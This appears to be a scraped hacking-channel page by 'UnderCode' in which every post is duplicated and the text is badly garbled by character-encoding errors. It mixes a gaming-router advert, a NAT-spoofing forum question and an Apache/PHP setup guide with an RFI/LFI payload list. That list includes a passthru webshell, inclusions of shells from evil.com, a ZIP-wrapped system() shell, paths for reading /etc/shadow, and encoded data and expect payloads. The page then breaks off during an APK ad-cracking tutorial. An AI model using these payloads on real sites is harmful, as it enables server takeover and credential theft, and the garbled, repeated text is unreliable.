β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Is it necessary for an Xbox console to use an accelerator? How did the Dolphin Acceleration Box improve the Xbox? by undercode
instagram.com/UnderCodeTestingCompany
π¦ ππΌππ πππΈβπ :
1 ) Over the past year, the number of console players has grown rapidly, and the number of Xbox console players, which is one of the three major consoles, has naturally increased significantly, reaching a level that can compete with the Sony PS4.
> Although XBOX no longer announces sales for reasons of paying more attention to player participation, but from the online feedback of games such as Halo 5, Battle Machine 4, and so on, the number of Xbox users is considerable, and in addition to the number, online feedback has another noteworthy The thing is that the Xbox online network is very unstable.
2) The Xbox online network is very unstable, which is mainly reflected in the high delay, character transient, packet loss, and ping, etc. It is necessary to wait for a long time before entering the game or game, causing players a headache. This environment is also forcing players to think about the need for Xbox Accelerators.
3) The Xbox Accelerator can improve the method of game data transmission! Improve the network manifestation in the Xbox game history. A good Xbox Accelerator can make the player's network appear very different, no longer subject the player to the game being unable to connect and disconnect And match the environment with long waiting times.
4) The first full-platform intelligent acceleration hardware-Dolphin Acceleration Box! It is well reflected in the Xbox console acceleration. Players can enjoy Dolphin Acceleration after holding a brief setting! The box improves the results under the HTSA intelligent acceleration strategy and experiences Differences before and after gaming network
5) The Dolphin Acceleration Box breaks through the limitation of NAT types, improves the P2P teaming experience, and uses intelligent acceleration methods to ensure that the network in the game history shows a stable and smooth state of connectivity. It is an Xbox accelerator you are worth buying.
6) Which Xbox accelerator is better, Dolphin Accelerator is your first choice. Dolphin acceleration box, plug and play to solve the poor NAT type in Xbox games. P2P matching speed is too slow and delays, etc., so that your Xbox game network steadily rises and enjoys a high-quality network.
Written by UnderCode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Is it necessary for an Xbox console to use an accelerator? How did the Dolphin Acceleration Box improve the Xbox? by undercode
instagram.com/UnderCodeTestingCompany
π¦ ππΌππ πππΈβπ :
1 ) Over the past year, the number of console players has grown rapidly, and the number of Xbox console players, which is one of the three major consoles, has naturally increased significantly, reaching a level that can compete with the Sony PS4.
> Although XBOX no longer announces sales for reasons of paying more attention to player participation, but from the online feedback of games such as Halo 5, Battle Machine 4, and so on, the number of Xbox users is considerable, and in addition to the number, online feedback has another noteworthy The thing is that the Xbox online network is very unstable.
2) The Xbox online network is very unstable, which is mainly reflected in the high delay, character transient, packet loss, and ping, etc. It is necessary to wait for a long time before entering the game or game, causing players a headache. This environment is also forcing players to think about the need for Xbox Accelerators.
3) The Xbox Accelerator can improve the method of game data transmission! Improve the network manifestation in the Xbox game history. A good Xbox Accelerator can make the player's network appear very different, no longer subject the player to the game being unable to connect and disconnect And match the environment with long waiting times.
4) The first full-platform intelligent acceleration hardware-Dolphin Acceleration Box! It is well reflected in the Xbox console acceleration. Players can enjoy Dolphin Acceleration after holding a brief setting! The box improves the results under the HTSA intelligent acceleration strategy and experiences Differences before and after gaming network
5) The Dolphin Acceleration Box breaks through the limitation of NAT types, improves the P2P teaming experience, and uses intelligent acceleration methods to ensure that the network in the game history shows a stable and smooth state of connectivity. It is an Xbox accelerator you are worth buying.
6) Which Xbox accelerator is better, Dolphin Accelerator is your first choice. Dolphin acceleration box, plug and play to solve the poor NAT type in Xbox games. P2P matching speed is too slow and delays, etc., so that your Xbox game network steadily rises and enjoys a high-quality network.
Written by UnderCode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦LAST 24 sended tutorials :
1) 2020 optimize script, performance monitor system- speed up android...
2) 2020 TOPIC Flutter makes it easy and fast to build beautiful mobile apps + pic
3) 2020 updated Hatch is a brute force tool that is used to brute force most websites
4) 2020 Custom bash scripts used to automate various penetration testing tasks including recon, scanning, parsing, and creating malicious payloads and listeners with Metasploit.
5) 2020 updated A security tool for multithreaded information gathering and service enumeration whilst building directory structures to store results, along with writing out recommendations for further testing.
6) STM32 series BIN file to source code C language by undercode
+ Leak & EXPLOITE pdf tutorial
7) Detailed DS28E01 typical applications and cracking methods
8) Is it necessary for an Xbox console to use an accelerator? How did the Dolphin Acceleration Box improve the Xbox? by undercode
ENJOY MORE FOR LATER !@UNDERCODETESTING
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦LAST 24 sended tutorials :
1) 2020 optimize script, performance monitor system- speed up android...
2) 2020 TOPIC Flutter makes it easy and fast to build beautiful mobile apps + pic
3) 2020 updated Hatch is a brute force tool that is used to brute force most websites
4) 2020 Custom bash scripts used to automate various penetration testing tasks including recon, scanning, parsing, and creating malicious payloads and listeners with Metasploit.
5) 2020 updated A security tool for multithreaded information gathering and service enumeration whilst building directory structures to store results, along with writing out recommendations for further testing.
6) STM32 series BIN file to source code C language by undercode
+ Leak & EXPLOITE pdf tutorial
7) Detailed DS28E01 typical applications and cracking methods
8) Is it necessary for an Xbox console to use an accelerator? How did the Dolphin Acceleration Box improve the Xbox? by undercode
ENJOY MORE FOR LATER !@UNDERCODETESTING
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Fix Commun error: Network Configuration-Deny Secondary Agent full by undercode :
fb.com/undercodeOfficial
π¦ ππΌππ πππΈβπ :
1) Because a legitimate IP (MAC and IP has been bound on Linux) was installed as a gateway, MASQUERADE allows all other users to masquerade as this legitimate IP through it, causing anyone to point the gateway It can go out.
> For example: The gateway of 192.168.1.168 (00: 01: 02: 49: 19: 85) points to 192.168.1.254 and can go out. Now two networks are installed on 192.168.1.168, eth0: 192.168.1.168, eth1: 10.136.14.254, configured as a NAT using MASQUERADE, so all 10.136.14.0/24 can be disguised as 192.168.1.168 and go out through 192.168.1.254 .
2) How to identify this situation and reject it or block the IP for one hour. DROP of ETH1 FORWARD to EXT-IP Thank you gentoo, but it seems that this is not the best solution. I understand, but you do nβt know clearly (maybe it βs a problem of my understanding ability), it βs convenient to make it clear!
3) This is a recent problem that occurred in our school. IP addresses used by professionals, this network segment can be MASQUERADE on the Internet through S, all IPs on this network segment are bound in / etc / ethers in GateWay S, excluding the possibility of others changing the IP (Of course, you can change the MAC address, this does not care about him). 10.136.14.0/24 This network segment is used by all ordinary students. The problem now is that some individual computer majors add a new network card to their computer, and then set up a Linux, and use MASQUERADE to pretend to be 192.168.1 for everyone on the 10.136.14.0/24 network segment.
4) X goes on the internet. As a result, many students often do things they shouldn't. So in response to this new situation, would you like to ask if you can refuse such a situation? Or have related commercial software.
5) Adding a network card yourself belongs to the category of physical attacks, and it is theoretically impossible to eliminate this situation. It is also useless to divide VLANs. The solution in our school is to rivet all the cases with rivets.
6) Only a few people have the right to open the case and then divide the VLAN, which works well. The IP of the network segment 192.168.1.0 is bound to the mac. The student uses the IP of the network segment 10.136.14.0/24.
7) How can the student obtain the IP of the network segment of 192.168.1.0? Students can't get the IP of 192.16.8.1.0 on this network segment, can't it be disguised? It is 192.168.1.0/24 that an IP owner set up a Linux, and then use MASQUERADE to disguise all 10.136.14.0/24 people as 192.168.1.X, so that 10.136.14.0/24 can go out Yeah. Theoretically, to prevent this situation, you need to be able to identify whether the packet is from the real 192.168.1.X or has been spoofed. But this seems to be more difficult, you need someone who can come up with a good idea
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Fix Commun error: Network Configuration-Deny Secondary Agent full by undercode :
fb.com/undercodeOfficial
π¦ ππΌππ πππΈβπ :
1) Because a legitimate IP (MAC and IP has been bound on Linux) was installed as a gateway, MASQUERADE allows all other users to masquerade as this legitimate IP through it, causing anyone to point the gateway It can go out.
> For example: The gateway of 192.168.1.168 (00: 01: 02: 49: 19: 85) points to 192.168.1.254 and can go out. Now two networks are installed on 192.168.1.168, eth0: 192.168.1.168, eth1: 10.136.14.254, configured as a NAT using MASQUERADE, so all 10.136.14.0/24 can be disguised as 192.168.1.168 and go out through 192.168.1.254 .
2) How to identify this situation and reject it or block the IP for one hour. DROP of ETH1 FORWARD to EXT-IP Thank you gentoo, but it seems that this is not the best solution. I understand, but you do nβt know clearly (maybe it βs a problem of my understanding ability), it βs convenient to make it clear!
3) This is a recent problem that occurred in our school. IP addresses used by professionals, this network segment can be MASQUERADE on the Internet through S, all IPs on this network segment are bound in / etc / ethers in GateWay S, excluding the possibility of others changing the IP (Of course, you can change the MAC address, this does not care about him). 10.136.14.0/24 This network segment is used by all ordinary students. The problem now is that some individual computer majors add a new network card to their computer, and then set up a Linux, and use MASQUERADE to pretend to be 192.168.1 for everyone on the 10.136.14.0/24 network segment.
4) X goes on the internet. As a result, many students often do things they shouldn't. So in response to this new situation, would you like to ask if you can refuse such a situation? Or have related commercial software.
5) Adding a network card yourself belongs to the category of physical attacks, and it is theoretically impossible to eliminate this situation. It is also useless to divide VLANs. The solution in our school is to rivet all the cases with rivets.
6) Only a few people have the right to open the case and then divide the VLAN, which works well. The IP of the network segment 192.168.1.0 is bound to the mac. The student uses the IP of the network segment 10.136.14.0/24.
7) How can the student obtain the IP of the network segment of 192.168.1.0? Students can't get the IP of 192.16.8.1.0 on this network segment, can't it be disguised? It is 192.168.1.0/24 that an IP owner set up a Linux, and then use MASQUERADE to disguise all 10.136.14.0/24 people as 192.168.1.X, so that 10.136.14.0/24 can go out Yeah. Theoretically, to prevent this situation, you need to be able to identify whether the packet is from the real 192.168.1.X or has been spoofed. But this seems to be more difficult, you need someone who can come up with a good idea
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Install PHP as Apache DSOPHP full by undercode
instagram.com/UnderCodeTestingCompany
π¦ ππΌππ πππΈβπ :
1) Install PHP as Apache DSOPHP is often used with the Apache Web server for Linux / Unix platforms. When we install PHP in the Apache environment, you have three installation modes to choose from: static modules, dynamic modules (DSO), and CGI.
2) I suggest you install PHP as Apached's DSO. This installation mode is very easy to maintain and upgrade. For example, suppose you originally installed only database support for PHP. But after a few days you decided to add encryption to PHP. Quite simply, you just need to type the make clean command, add new configuration options, and then execute the make and make install commands.
3) In this way, the new PHP module will be installed in the appropriate location on Apache, you just restart Apache and everything is OK, of course, the entire process does not need to recompile Apache at all.
4) The simple steps to install a new version of Apache and PHP as an
π¦ Apache DSO are as follows:
1) Download the latest version of the source code for the Apache server software from the Apache Software Foundation site.
2) Place the code files in a suitable directory such as / usr / local / or / opt /.
3) Use the Gunzip command to decompress the code file, then you can get the corresponding * .tar file.
4) Type the following unpacking command to place the above tar file in a directory of the form apache_ [version]:
tar -xvf apache_ [version] .tar
5) Go to the / usr / local / apache_ [version] directory (or The directory you specified in the above step).
6) Type the following configuration command and replace the [path] parameter with the path you set (such as / usr / local / apache [version], etc., be careful not to follow the slash!), And you also need to enable the mod_so parameter to allow Apache uses DSO.
./configure --prefix = [path] --enable-module = so
7) Return to the command prompt and type make and wait for the command execution to complete and return to the command prompt again.
8) Type make install.
At this point, the compiler can create the final directory and return to the system command prompt.
π¦ Next install PHP:
1)Visit the download area of ββthe PHP homepage and select the link for the latest version of the source code.
2) Place the downloaded file in an appropriate directory such as / usr / local / or / opt /.
3) Use the Gunzip command to decompress the code file, then you can get the corresponding * .tar file.
4)Type the following unpacking command to put the above tar file into a directory of the form php- [version]:
tar -xvf php- [version]
5) Go to the / usr / local / php- [version] directory (Or the directory you specified).
Now you can compile PHP DSO. In fact, only one necessary configuration option is needed here-with-apxs (a file in the Apache bin directory)-however, for more comprehensive system configuration, we also added a MySQL database here support.
./configure --with-mysql = / [path to mysql] --with-apxs = / [path to apxs]
6) Return to the command prompt and type make and wait until the command is complete and return to the command prompt. .
7) Type the make install command.
π¦ At this time, the compiler will create the final DSO and place it in the Apache module directory. At the same time, it will modify the Apache httpd.conf configuration file for you. After that, the system returns to the command prompt and waits for you to enter new instructions. Then, you can open the Apache httpd.conf configuration file to make some corrections:
1) Find the line with ServerAdmin and add your own email address, as follows:
ServerAdmin you@yourdomain.com
2) Find the beginning with ServerName Line, change the following parameters to actual values, such as:
ServerName localhost
3) Find the following paragraph:
# And for PHP 4.x, use:
#
#AddType application / x-httpd-php .php
#AddType application / x- httpd-php-source.phps
π¦ Install PHP as Apache DSOPHP full by undercode
instagram.com/UnderCodeTestingCompany
π¦ ππΌππ πππΈβπ :
1) Install PHP as Apache DSOPHP is often used with the Apache Web server for Linux / Unix platforms. When we install PHP in the Apache environment, you have three installation modes to choose from: static modules, dynamic modules (DSO), and CGI.
2) I suggest you install PHP as Apached's DSO. This installation mode is very easy to maintain and upgrade. For example, suppose you originally installed only database support for PHP. But after a few days you decided to add encryption to PHP. Quite simply, you just need to type the make clean command, add new configuration options, and then execute the make and make install commands.
3) In this way, the new PHP module will be installed in the appropriate location on Apache, you just restart Apache and everything is OK, of course, the entire process does not need to recompile Apache at all.
4) The simple steps to install a new version of Apache and PHP as an
π¦ Apache DSO are as follows:
1) Download the latest version of the source code for the Apache server software from the Apache Software Foundation site.
2) Place the code files in a suitable directory such as / usr / local / or / opt /.
3) Use the Gunzip command to decompress the code file, then you can get the corresponding * .tar file.
4) Type the following unpacking command to place the above tar file in a directory of the form apache_ [version]:
tar -xvf apache_ [version] .tar
5) Go to the / usr / local / apache_ [version] directory (or The directory you specified in the above step).
6) Type the following configuration command and replace the [path] parameter with the path you set (such as / usr / local / apache [version], etc., be careful not to follow the slash!), And you also need to enable the mod_so parameter to allow Apache uses DSO.
./configure --prefix = [path] --enable-module = so
7) Return to the command prompt and type make and wait for the command execution to complete and return to the command prompt again.
8) Type make install.
At this point, the compiler can create the final directory and return to the system command prompt.
π¦ Next install PHP:
1)Visit the download area of ββthe PHP homepage and select the link for the latest version of the source code.
2) Place the downloaded file in an appropriate directory such as / usr / local / or / opt /.
3) Use the Gunzip command to decompress the code file, then you can get the corresponding * .tar file.
4)Type the following unpacking command to put the above tar file into a directory of the form php- [version]:
tar -xvf php- [version]
5) Go to the / usr / local / php- [version] directory (Or the directory you specified).
Now you can compile PHP DSO. In fact, only one necessary configuration option is needed here-with-apxs (a file in the Apache bin directory)-however, for more comprehensive system configuration, we also added a MySQL database here support.
./configure --with-mysql = / [path to mysql] --with-apxs = / [path to apxs]
6) Return to the command prompt and type make and wait until the command is complete and return to the command prompt. .
7) Type the make install command.
π¦ At this time, the compiler will create the final DSO and place it in the Apache module directory. At the same time, it will modify the Apache httpd.conf configuration file for you. After that, the system returns to the command prompt and waits for you to enter new instructions. Then, you can open the Apache httpd.conf configuration file to make some corrections:
1) Find the line with ServerAdmin and add your own email address, as follows:
ServerAdmin you@yourdomain.com
2) Find the beginning with ServerName Line, change the following parameters to actual values, such as:
ServerName localhost
3) Find the following paragraph:
# And for PHP 4.x, use:
#
#AddType application / x-httpd-php .php
#AddType application / x- httpd-php-source.phps
modify these configuration lines to uncomment some of the comments before AddType under PHP 4.0. At the same time you should add some file extensions used by PHP. The above modified lines may look like Here's how:
# And for PHP 4.x, use:
#
AddType application / x-httpd-php .php .phtml
AddType application / x-httpd-php-source .phps
Save the above configuration file and return to the parent directory, Start Apache by typing:
./bin/apachectl start
π¦If there are no problems during startup, you can test the installation of Apache and PHP by creating a file called phpinfo.php, which contains the following lines of code:
<? Phpinfo ()?>
> Save the file and Place it in the Apache document root directory (htdocs), then start your web browser, type http: //localhost/phpinfo.php in the browser address bar, and the browser will display a large space Various variables and variable values ββof the PHP and Apache systems.
> If you want to reset PHP, all you need to do is run the make clean command, then the ./configure command with the new configuration options, and then make and make install. In this way, a new module will appear in the Apache module directory, you just need to restart Apache to load the new module. Many previous headaches are now solved.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
# And for PHP 4.x, use:
#
AddType application / x-httpd-php .php .phtml
AddType application / x-httpd-php-source .phps
Save the above configuration file and return to the parent directory, Start Apache by typing:
./bin/apachectl start
π¦If there are no problems during startup, you can test the installation of Apache and PHP by creating a file called phpinfo.php, which contains the following lines of code:
<? Phpinfo ()?>
> Save the file and Place it in the Apache document root directory (htdocs), then start your web browser, type http: //localhost/phpinfo.php in the browser address bar, and the browser will display a large space Various variables and variable values ββof the PHP and Apache systems.
> If you want to reset PHP, all you need to do is run the make clean command, then the ./configure command with the new configuration options, and then make and make install. In this way, a new module will appear in the Apache module directory, you just need to restart Apache to load the new module. Many previous headaches are now solved.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ RFI/LFI Payload List :
fb.com/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) As with many exploits, remote and local file inclusions are only a problem at the end of the encoding. Of course it takes a second person to have it. Now this article will hopefully give you an idea of protecting your website and most importantly your code from a file iclusion exploit. Iβll give code examples in PHP format.
2) Letβs look at some of the code that makes RFI / LFI exploits possible.
<a href=index.php?page=file1.php> Files </a>
<? Php
$ page = $ _GET [page];
include ($ page);
?>
3) Now obviously this should not be used. The $ page entry is not fully cleared. $ page input is directed directly to the damn web page, which is a big βNOβ. Always remove any input passing through the browser. When the user clicks on βFileβ to visit βfiles.phpβ when he visits the web page, something like this will appear.
http: //localhost/index.php? page = files.php
4) Now if no one has cleared the input in the $ page variable, we can have it pointed to what we want. If hosted on a unix / linux server, we can display the password as configuration files for shaded or uncleaned variable input.
5) Viewing files on the server is a βLocal File Inclusionβ or LFI exploit. This is no worse than an RFI exploit.
http: //localhost/index.php? page = .. / .. / .. / .. / .. / .. / etc / passwd
The code will probably return to / etc / passwd. Now letβs look at the RFI aspect of this exploit. Letβs get some of the codes weβve taken before.
<a href=index.php?page=file1.php> Files </a>
<? Php
$ page = $ _GET [page];
include ($ page);
?>
6) Now suppose we write something like β¦
http: //localhost/index.php? page = http: //google.com/
Probably where the $ page variable was originally placed on the page, we get the google.com homepage. This is where the codder can be hurt. We all know what c99 (shell) can do, and if coders are careful, they may be included in the page, allowing users to surf through sensitive files and contacts at the appropriate time. Letβs look at something simpler that can happen on a web page. The faster and more dirty use of RFI exploitation is to your advantage. Now, create a file named βtest.phpβ and put the following code in it and save it.
<? Php
passthru ($ _ GET [cmd]);
?>
7) Now this file is something you can use to your advantage to include it on a page with RFI exploitation. The passthru () command in PHP is very evil, and many hosts call it βout of service for security reasonsβ. With this code in test.php, we can send a request to the web page, including file inclusion exploit.
http: //localhost/index.php? page = http: //someevilhost.com/test.php
When the code makes a $ _GET request, we must provide a command to pass to passthru (). We can do something like this.
8) http: //localhost/index.php? page = http: //someevilhost.com/test.php? cmd = cat / etc / passwd
This unix machine will also extract the file / etc / passwd using the cat command. Now we know how to exploit RFI exploit, now we need to know how to hold it and make it impossible for anyone to execute the command, and how to include remote pages on your server. First, we can disable passthru (). But anything on your site can use it again (hopefully not). But this is the only thing you can do. I suggest cleaning the inputs as I said before. Now, instead of just passing variables directly to the page, we can use a few PHP-proposed structures within functions. Initially, chop () from perl was adapted to PHP, which removes whitespaces from an array. We can use it like this.
<a href=index.php?page=file1.php> Files </a>
<? Php
$ page = chop ($ _ GET [page]);
include ($ page);
?>
9) There are many functions that can clear string. htmlspecialchars () htmlentities (), stripslashes () and more. In terms of confusion, I prefer to use my own functions. We can do a function in PHP that can clear everything for you, here Iβve prepared something easy and quick about this course for you.
π¦ RFI/LFI Payload List :
fb.com/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) As with many exploits, remote and local file inclusions are only a problem at the end of the encoding. Of course it takes a second person to have it. Now this article will hopefully give you an idea of protecting your website and most importantly your code from a file iclusion exploit. Iβll give code examples in PHP format.
2) Letβs look at some of the code that makes RFI / LFI exploits possible.
<a href=index.php?page=file1.php> Files </a>
<? Php
$ page = $ _GET [page];
include ($ page);
?>
3) Now obviously this should not be used. The $ page entry is not fully cleared. $ page input is directed directly to the damn web page, which is a big βNOβ. Always remove any input passing through the browser. When the user clicks on βFileβ to visit βfiles.phpβ when he visits the web page, something like this will appear.
http: //localhost/index.php? page = files.php
4) Now if no one has cleared the input in the $ page variable, we can have it pointed to what we want. If hosted on a unix / linux server, we can display the password as configuration files for shaded or uncleaned variable input.
5) Viewing files on the server is a βLocal File Inclusionβ or LFI exploit. This is no worse than an RFI exploit.
http: //localhost/index.php? page = .. / .. / .. / .. / .. / .. / etc / passwd
The code will probably return to / etc / passwd. Now letβs look at the RFI aspect of this exploit. Letβs get some of the codes weβve taken before.
<a href=index.php?page=file1.php> Files </a>
<? Php
$ page = $ _GET [page];
include ($ page);
?>
6) Now suppose we write something like β¦
http: //localhost/index.php? page = http: //google.com/
Probably where the $ page variable was originally placed on the page, we get the google.com homepage. This is where the codder can be hurt. We all know what c99 (shell) can do, and if coders are careful, they may be included in the page, allowing users to surf through sensitive files and contacts at the appropriate time. Letβs look at something simpler that can happen on a web page. The faster and more dirty use of RFI exploitation is to your advantage. Now, create a file named βtest.phpβ and put the following code in it and save it.
<? Php
passthru ($ _ GET [cmd]);
?>
7) Now this file is something you can use to your advantage to include it on a page with RFI exploitation. The passthru () command in PHP is very evil, and many hosts call it βout of service for security reasonsβ. With this code in test.php, we can send a request to the web page, including file inclusion exploit.
http: //localhost/index.php? page = http: //someevilhost.com/test.php
When the code makes a $ _GET request, we must provide a command to pass to passthru (). We can do something like this.
8) http: //localhost/index.php? page = http: //someevilhost.com/test.php? cmd = cat / etc / passwd
This unix machine will also extract the file / etc / passwd using the cat command. Now we know how to exploit RFI exploit, now we need to know how to hold it and make it impossible for anyone to execute the command, and how to include remote pages on your server. First, we can disable passthru (). But anything on your site can use it again (hopefully not). But this is the only thing you can do. I suggest cleaning the inputs as I said before. Now, instead of just passing variables directly to the page, we can use a few PHP-proposed structures within functions. Initially, chop () from perl was adapted to PHP, which removes whitespaces from an array. We can use it like this.
<a href=index.php?page=file1.php> Files </a>
<? Php
$ page = chop ($ _ GET [page]);
include ($ page);
?>
9) There are many functions that can clear string. htmlspecialchars () htmlentities (), stripslashes () and more. In terms of confusion, I prefer to use my own functions. We can do a function in PHP that can clear everything for you, here Iβve prepared something easy and quick about this course for you.
Facebook
Log in or sign up to view
See posts, photos and more on Facebook.
<? Php
function cleanAll ($ input) {
$ input = strip_tags ($ input);
$ input = htmlspecialchars ($ input);
return ($ input);
}
?>
10) Now I hope you can see whatβs going on inside this function, so you can add yours. I would suggest using the str_replace () function and there are a lot of other functions to clear them. Be considerate and stop the RFI & LFI exploit frenzy!
Basic LFI (null byte, double encoding and other tricks) :
http://example.com/index.php?page=etc/passwd
http://example.com/index.php?page=etc/passwd%00
http://example.com/index.php?page=../../etc/passwd
http://example.com/index.php?page=%252e%252e%252f
http://example.com/index.php?page=....//....//etc/passwd
Interesting files to check out :
/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor)
/proc/self/environ
/proc/version
/proc/cmdline
Basic RFI (null byte, double encoding and other tricks) :
http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=http://evil.com/shell.txt%00
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
LFI / RFI Wrappers :
LFI Wrapper rot13 and base64 - php://filter case insensitive.
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
11) Can be chained with a compression wrapper.
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
LFI Wrapper ZIP :
echo "</pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php
http://example.com/index.php?page=zip://shell.jpg%23payload.php
RFI Wrapper DATA with "" payload :
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
RFI Wrapper EXPECT :
http://example.com/index.php?page=php:expect://id
http://example.com/index.php?page=php:expect://ls
XSS via RFI/LFI with "" payload :
http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
LFI to RCE via /proc/*/fd :
Upload a lot of shells (for example : 100)
Include http://example.com/index.php?page=/proc/$PID/fd/$FD with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too)
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
function cleanAll ($ input) {
$ input = strip_tags ($ input);
$ input = htmlspecialchars ($ input);
return ($ input);
}
?>
10) Now I hope you can see whatβs going on inside this function, so you can add yours. I would suggest using the str_replace () function and there are a lot of other functions to clear them. Be considerate and stop the RFI & LFI exploit frenzy!
Basic LFI (null byte, double encoding and other tricks) :
http://example.com/index.php?page=etc/passwd
http://example.com/index.php?page=etc/passwd%00
http://example.com/index.php?page=../../etc/passwd
http://example.com/index.php?page=%252e%252e%252f
http://example.com/index.php?page=....//....//etc/passwd
Interesting files to check out :
/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor)
/proc/self/environ
/proc/version
/proc/cmdline
Basic RFI (null byte, double encoding and other tricks) :
http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=http://evil.com/shell.txt%00
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
LFI / RFI Wrappers :
LFI Wrapper rot13 and base64 - php://filter case insensitive.
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
11) Can be chained with a compression wrapper.
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
LFI Wrapper ZIP :
echo "</pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php
http://example.com/index.php?page=zip://shell.jpg%23payload.php
RFI Wrapper DATA with "" payload :
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
RFI Wrapper EXPECT :
http://example.com/index.php?page=php:expect://id
http://example.com/index.php?page=php:expect://ls
XSS via RFI/LFI with "" payload :
http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
LFI to RCE via /proc/*/fd :
Upload a lot of shells (for example : 100)
Include http://example.com/index.php?page=/proc/$PID/fd/$FD with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too)
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Android APP cracked to advertising complete tutorial Full by UnderCode :
instagram.com/UnderCodeTestingCompany
π¦ ππΌππ πππΈβπ :
1) WHAT EXCTLY WE WANT :
> Power consumption, power consumption, screen space, flickering eye-catching, accidental touch, this advertising method is intolerable for patients with obsessive-compulsive disorder, I believe most people will also be disgusted, so the commonly used apps are almost Never seen it. From the perspective of learning, I tried to hack this application and "block" the advertising function.
2) Unzip
Download the apk file, modify the suffix to .zip, and extract it to a folder
3) among them:
> assets folder -put native asset files
>lib folder -put reference library files
>META-INF folder -put manifest file
>res folder -put resource files
>AndroidManifest.xml -Android manifest
>resources.arsc -the main resources file
>The above are mainly related to resources. If you need to extract some
pictures or sound resources, you can find them directly in the folder. The remaining classes.dex file is more important. It is a packaging format for classes in Android. .
4) View the jar
To view the code, you need to convert the dex file into a jar file. Here is a recommended software "Android Reverse Assistant"
5) It integrates apktool, autosign, dex2jar, jd-gui and other common tools, which is very convenient.
Here, select the dex2jar function, browse the source files, select the decompressed classes.dex file, and click the operation button to automatically generate the classes_dex2jar.jar file.
Then select jd to open the jar function, you can call jd-gui to view the jar file.
π¦ Android APP cracked to advertising complete tutorial Full by UnderCode :
instagram.com/UnderCodeTestingCompany
π¦ ππΌππ πππΈβπ :
1) WHAT EXCTLY WE WANT :
> Power consumption, power consumption, screen space, flickering eye-catching, accidental touch, this advertising method is intolerable for patients with obsessive-compulsive disorder, I believe most people will also be disgusted, so the commonly used apps are almost Never seen it. From the perspective of learning, I tried to hack this application and "block" the advertising function.
2) Unzip
Download the apk file, modify the suffix to .zip, and extract it to a folder
3) among them:
> assets folder -put native asset files
>lib folder -put reference library files
>META-INF folder -put manifest file
>res folder -put resource files
>AndroidManifest.xml -Android manifest
>resources.arsc -the main resources file
>The above are mainly related to resources. If you need to extract some
pictures or sound resources, you can find them directly in the folder. The remaining classes.dex file is more important. It is a packaging format for classes in Android. .
4) View the jar
To view the code, you need to convert the dex file into a jar file. Here is a recommended software "Android Reverse Assistant"
5) It integrates apktool, autosign, dex2jar, jd-gui and other common tools, which is very convenient.
Here, select the dex2jar function, browse the source files, select the decompressed classes.dex file, and click the operation button to automatically generate the classes_dex2jar.jar file.
Then select jd to open the jar function, you can call jd-gui to view the jar file.
This media is not supported in your browser
VIEW IN TELEGRAM
π¦ ou can see in jd-gui that most of the code is obfuscated, and the code optimized by the compiler will be different from the source code, but the logic is still the same, and it can still be roughly understood if you look carefully.
6) find ad pages and code
To find the activity of the advertisement page, connect the phone to the computer, and log will be output in the logcat of Android Studio or Eclipse. Enter "ActivityManager" in the log search field. When the advertisement page is launched, you can see the full name of Acitivty in the log Then find this Activity in jd-gui.
6) find ad pages and code
To find the activity of the advertisement page, connect the phone to the computer, and log will be output in the logcat of Android Studio or Eclipse. Enter "ActivityManager" in the log search field. When the advertisement page is launched, you can see the full name of Acitivty in the log Then find this Activity in jd-gui.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
SECOND STEP - CRACKING APK :
π¦ Analysis code: The
